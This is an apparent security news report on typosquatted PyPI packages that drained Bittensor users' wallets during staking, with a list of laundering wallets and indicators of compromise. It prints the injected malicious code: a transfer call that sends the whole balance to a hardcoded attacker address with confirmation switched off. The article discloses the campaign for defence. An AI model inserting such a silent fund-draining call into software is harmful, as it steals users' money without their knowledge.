GitLab’s Vulnerability Research team has uncovered a sophisticated cryptocurrency theft campaign that exploited typosquatted Python packages on PyPI to steal funds from Bittensor ecosystem users.
The attack, discovered through automated package monitoring, represents a calculated assault on one of blockchain’s most trusted operations: staking.
Malicious Code Hijacks Staking Operations
The attackers published five malicious packages within a 25-minute window on August 6, 2025, including [email protected], [email protected], and [email protected].
These packages mimicked legitimate Bittensor components through strategic typosquatting, exploiting common typing errors like missing characters (“bitensor” instead of “bittensor”) and truncated names (“bittenso” for “bittensor”).
The attack’s technical sophistication lies in its surgical modification of the stake_extrinsic function within bittensor_cli/src/commands/stake/add.py. At line 275, where users expect normal staking operations, malicious code silently executes a complete wallet drain:
pythonresult = await transfer_extrinsic(
subtensor=subtensor,
wallet=wallet,
destination="5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR",
amount=amount,
transfer_all=True,
prompt=False
)
This injection bypasses user confirmation (prompt=False), steals all available funds (transfer_all=True), and routes everything to the attacker’s hardcoded wallet address. Users believe they’re earning staking rewards, but their wallets are being completely emptied.
Complex Money Laundering Network Traced
GitLab researchers tracked the stolen cryptocurrency through a multi-hop laundering scheme.
Funds initially collected at the primary wallet 5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR were rapidly distributed through intermediate wallets, including 5HpsyxZKvCvLEdLTkWRM4d7nHPnXcbm4ayAsJoaVVW2TLVP1 and 5GiqMKy1kAXN6j9kCuog59VjoJXUL2GnVSsmCRyHkggvhqNC before consolidating at 5D6BH6ai79EVN51orsf9LG3k1HXxoEhPaZGeKBT5oDwnd2Bu and ultimately reaching the cash-out endpoint 5HDo9i9XynX44DFjeoabFqPF3XXmFCkJASC7FxWpbqv6D7QQ.
The timing suggests careful coordination, with all malicious packages deployed simultaneously to maximize impact before detection.
By targeting staking functionality specifically, attackers exploited both the technical requirements of wallet authentication and user psychology around routine blockchain operations.
This incident underscores the critical importance of supply chain security in cryptocurrency ecosystems, where a single typo during package installation can result in complete financial loss.
GitLab’s swift detection and analysis demonstrate the value of proactive monitoring systems in protecting the broader development community from sophisticated threats.
Indicators of compromise
| IOC | Description |
|---|---|
pkg:pypi/[email protected] | Malicious PyPI package |
pkg:pypi/[email protected] | Malicious PyPI package |
pkg:pypi/[email protected] | Malicious PyPI package |
pkg:pypi/[email protected] | Malicious PyPI package |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
_imresizer.jpg?resize=1068,580&ssl=1&description=Bittensor wallets - GitLab's Vulnerability Research team has uncovered a sophisticated cryptocurrency theft campaign that exploited.){kind=link}